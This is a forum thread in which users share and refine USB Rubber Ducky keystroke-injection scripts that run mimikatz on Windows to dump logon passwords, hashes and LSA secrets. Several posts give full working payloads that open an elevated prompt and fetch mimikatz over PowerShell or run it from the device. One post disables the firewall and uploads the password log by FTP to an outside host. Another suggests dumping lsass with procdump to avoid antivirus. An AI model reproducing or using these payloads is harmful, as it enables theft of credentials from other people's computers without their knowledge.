Jump to content

[payload] Ducky script using mimikatz to dump passwords from memory


Recommended Posts

Hello all,

This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes including the clear text passwords for wdigest from memory.

http://blog.gentilkiwi.com/securite/mimikatz/minidump

http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

Requirements -:

- Webserver to host Mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit) you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture

- Local user needs to be an administrator account/privs

What does it do ?

1. It spawns a command shell with administrator privileges

2. It downloads mimikatz from a webserver using powershell

3. Using mimikatz to dump wdigest passwords from memory

4. Cleans up by deleting the binaries it downloaded

It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite e.g. socat, ncat SSL, stunnel etc If you have a firmware installed that lets you store files you could copy the output to the SD card. Also mimikatz file could be encoded and run through powershell to generate the executable instead of 'wget'ing' the file.

You may need to adjust timings in this script to play nice on your machine(s).

Script -:

REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe')
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER

Thanks for reading :)

Aaron

Edited by redmeatuk
Link to comment
Share on other sites

AFAIK it dumps passwords for the currently logged in user. Mimikatz only works with Windows.

Update - I see that you do not require SYSTEM privileges to get this to work, just need to launch cmd.exe with administrator privileges and then run mimikatz commands. I've amended the script.

Edited by redmeatuk
Link to comment
Share on other sites

WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext!

I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead?

I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here.

Link to comment
Share on other sites

WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext!

I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead?

I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here.

sounds promicing , looking forward to see it in action.

Link to comment
Share on other sites

Woo! Finally posting my own working payload! Thanks to overwraith and readmeatuk for their base code that I just tied together. This basically does exactly what readmeatuk's code does except you won't need an internet connection.

Requirements:

1) Twin duck firmware or whatever it's called that lets you have a usb storage as well as firing inject.bin upon insertion.

2) mimikatz.exe (either 32bit or 64 bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory

Notes: I tried to do it with procdump but it takes a LONG time to write out the 36meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky but it's still going to take awhile. I don't think that many AV programs are looking for mimikatz so it's fairly safe,.

This script could be optimized a little, it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@

REM Author: shutin who just tied two other authors together: 
REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party
REM Name: Runmimikatz.txt
DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin and we need that for mimikatz
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part booyah
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM 
REM FINALLY ACTUALLY RUN AN EXE 
STRING START %myd%\mimikatz.exe
ENTER
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER
DELAY 1000
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
Link to comment
Share on other sites

There was certainly room for improvement, nice work shutin ;)

Thanks! Mimikatz is a weird tool. Is there anyway to get it out spit output into a text file? It's mostly in french so it's a bit hard to understand. There is also no "help".I really want to get my version to dump the output back to the ducky drive instead of just displaying the console window.

Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1

This tool rocks!

but will it work if the pasword is one of those cloud passwords? I had trouble trying to extract those because I think they are stored online.

Link to comment
Share on other sites

I've not seen any switches or examples of how to get mimikatz to output to a file, there may be an equivalent of script/tee on Windows, this works but you will not see any output as standard error and output will be redirected to a textfile of your choosing e.g. -:

mimikatz.exe > output.txt 2>&1

Then just issue your commands as normal and exit.

Cloud passwords ? Not sure, give it time though I'm sure someone will figure it all out :)

Edited by redmeatuk
Link to comment
Share on other sites

  • 1 month later...

Hello, for those of you that want a text file output on windows and ftp upload:

DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 2000
CTRL-SHIFT ENTER
DELAY 2000
STRING netsh firewall set opmode disable
DELAY 500
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://mimikatz.exe,%TEMP%\mimikatz.exe')
ENTER
DELAY 4000
STRING cd %temp%
DELAY 300
ENTER
DELAY 500
STRING mimikatz.exe > pwlog.txt & type pwlog.txt
DELAY 300
ENTER
DELAY 1000
STRING privilege::debug
DELAY 300
ENTER
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 500
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER
STRING move pwlog.txt c:\
ENTER
DELAY 300
STRING ftp yoursite.com
ENTER
DELAY 1000
STRING youruser
ENTER
DELAY 1000
STRING yourpass
ENTER
DELAY 1000
STRING lcd c:\
ENTER
DELAY 800
STRING put pwlog.txt
ENTER
DELAY 500
STRING quit
ENTER
DELAY 300
STRING del c:\pwlog.txt
ENTER
Edited by DyFukA
Link to comment
Share on other sites

Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk,

REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

Link to comment
Share on other sites

  • 2 weeks later...

Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER
Link to comment
Share on other sites

Comment from Youtube on the latest episode featuring the payload suggests OS / CPU detection.

sendforththegunboats

You could improve this further by detecting your OS architecture using the %processor_architecture% variable then running the specific command based on the output.

The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz. Any takers?

Link to comment
Share on other sites

  • 4 weeks later...

So noob question here. I can't seem to get mimikatz to run after insertion. I have copied Darren's code from above, but for some reason it exits prior to executing the .exe file. I modified his a bit, maybe someone can look at this.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x86 
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 1000
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

I changed the %duck%mimikatz_alpha_x64.exe to just be mimikatz.exe

That should work right? I copied the alpha/win32/mimikatz.exe over but it still doesn't seem to run. It seems simply skip over this and exit. Any ideas?

Edited by mypyramorhinx
Link to comment
Share on other sites

No one wants to help me out here? I can't seem to get this to work. The other problem that I have, well part of this problem, is that the mimikatz application is not named as it is listed here in the ducky code. It is simply named mimikatz.exe. I know to take the program from the right folder, but I seem to be at a stand still. Anyone out there that can help with this payload?

Link to comment
Share on other sites

  • 4 weeks later...

Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

This gives me following error:

mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes

ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found !

Module : privilege

Full name : Privilege module

debug - Ask debug privilege

LOOK AT: ::logonPasswordssamdump

I have missing spaces in my commandline.

This line: STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

doesn't create spaces in the commandline between debug" "sekurlsa and full" "samdump

PLEASE HELP. Seems simple?!

Link to comment
Share on other sites

  • 1 month later...

If you cd %duck% before, you can use :

  • mimikatz privilege::debug log sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit
  • mimikatz privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit
  • mimikatz privilege::debug sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit > filename.log
Link to comment
Share on other sites

  • 7 months later...

Hi everybody :lol:

After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex

ButfFwkIEAIbc1X.jpg

Enjoy my script, and let me know if any improvement needed (be nice, it's my first one :tongue: )

DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER

You only need at the root of the key:

  • mimikatz_x86.exe
  • mimikatz_amd64.exe

mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.

Link to comment
Share on other sites

Hi everybody :lol:

After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex

ButfFwkIEAIbc1X.jpg

Enjoy my script, and let me know if any improvement needed (be nice, it's my first one :tongue: )

DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER

You only need at the root of the key:

  • mimikatz_x86.exe
  • mimikatz_amd64.exe

mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.

Hello,

thank you fore your script .

but i have an issue (i am newbie..)

on your script you are writing "ALT o"

but i don't know what it mean, and it doesn't do anything on my computer.

(france/belgium)

so when the script is processing, it just writing "o" on the terminal

can you help me ?

thanks !

C:\Users\XXX>ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC

KY"') do set DUCKY=%d
'ofor' is not recognized as an internal or external command,
operable program or batch file.
Link to comment
Share on other sites

'ALT o' is to bypass UAC in French ;), replace it with 'y' for English

If no UAC, you can remove it ;)

ooh, right, i have forgotten you are french.:)

but, it s not working on my PC (french too) , so it is just written "o" on the cmd. so the next command line is broken

-for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC

KY"') do set DUCKY=%d
become
-ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUC
KY"') do set DUCKY=%d

do you mean ALT GR "o" ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...